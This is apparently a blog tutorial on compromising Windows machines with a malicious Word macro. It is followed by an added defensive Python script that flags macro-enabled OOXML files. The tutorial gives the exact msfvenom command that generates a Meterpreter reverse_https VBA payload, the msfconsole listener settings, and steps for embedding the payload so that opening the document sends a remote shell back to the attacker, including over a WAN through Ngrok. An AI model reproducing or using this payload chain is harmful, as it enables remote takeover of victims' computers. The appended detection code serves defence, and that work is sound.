THIS METHOD IS FOR WINDOWS MACHINES WITH MINIMAL SECURITY
The idea here is to hack Windows 7 or 10 with a simple Word document file that runs a macro, but as I said at the top, the machine has to have a low level of security or not be updated on a regular basis.
Let’s start by creating the malicious code with “msfvenom”:
msfvenom -p windows/meterpreter/reverse_https lhost=192.168.1.11 lport=4444 -f vba
Copy the output of the command; we’re going to paste it inside the macro of the Word document file. Now let’s start the listener for the reverse shell using “msfconsole”:
The configuration should be as follows:
set payload windows/meterpreter/reverse_https
set lhost <your IP>
set lport <your port>
Now let’s open Word on your Windows machine and go to “View”, then click on “Macro”, give it the name “Test”, and then click “Create”:
Now paste the code from “msfvenom” inside the macro section:
Save it with any name, but as a “Word Macro-Enabled Document”:
Now on the Linux machine terminal, just type “exploit” and wait for the victim to open the Word file (in this case we are the victim):
Now as soon as the file is opened, we will get a reverse shell back:
Keep in mind this method has a 50/50 chance of working; in some cases it worked for me even over a WAN network using Ngrok, and sometimes the antivirus caught it on running.
There are some other methods to bypass the AV; I will try to write about them in the future.
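From the defender's side, the file saved above as a “Word Macro-Enabled Document” is a ZIP container that carries a VBA project part and a macro-enabled content type, both of which a mail gateway or triage script can check before anyone opens it. The following is an added example, not part of the original post; the function names and the sample containers are constructed for illustration.

```python
import io
import zipfile

# Content type Word assigns to the main part of a macro-enabled document
MACRO_CONTENT_TYPE = "application/vnd.ms-word.document.macroEnabled.main+xml"
PLAIN_CONTENT_TYPE = ("application/vnd.openxmlformats-officedocument."
                      "wordprocessingml.document.main+xml")

def inspect_ooxml(data: bytes) -> dict:
    """Report macro indicators in an OOXML (docx/docm) file given as bytes."""
    result = {"is_ooxml": False, "vba_parts": [], "macro_content_type": False}
    if not zipfile.is_zipfile(io.BytesIO(data)):
        return result  # legacy .doc (OLE2) or not a document: needs another parser
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
        if "[Content_Types].xml" not in names:
            return result  # a ZIP, but not an OOXML package
        result["is_ooxml"] = True
        # The VBA project is stored as a binary part, normally word/vbaProject.bin
        result["vba_parts"] = [n for n in names if n.lower().endswith("vbaproject.bin")]
        types = zf.read("[Content_Types].xml").decode("utf-8", errors="replace")
        result["macro_content_type"] = MACRO_CONTENT_TYPE in types
    return result

def should_quarantine(data: bytes) -> bool:
    """Flag the file if either indicator is present, whatever its extension says."""
    r = inspect_ooxml(data)
    return bool(r["vba_parts"]) or r["macro_content_type"]

def build_sample(macro: bool) -> bytes:
    """Constructed minimal container: not a real Word file and holds no VBA code."""
    main_type = MACRO_CONTENT_TYPE if macro else PLAIN_CONTENT_TYPE
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml",
                    f'<Types><Override PartName="/word/document.xml" '
                    f'ContentType="{main_type}"/></Types>')
        zf.writestr("word/document.xml", "<w:document/>")
        if macro:
            zf.writestr("word/vbaProject.bin", b"\x00placeholder")
    return buf.getvalue()

if __name__ == "__main__":
    for label in (False, True):
        sample = build_sample(label)
        print("macro" if label else "plain", inspect_ooxml(sample),
              "quarantine:", should_quarantine(sample))
```

The check works on file contents rather than the extension, so it still fires if the document is renamed; legacy binary .doc files are not ZIP packages and are reported as not OOXML.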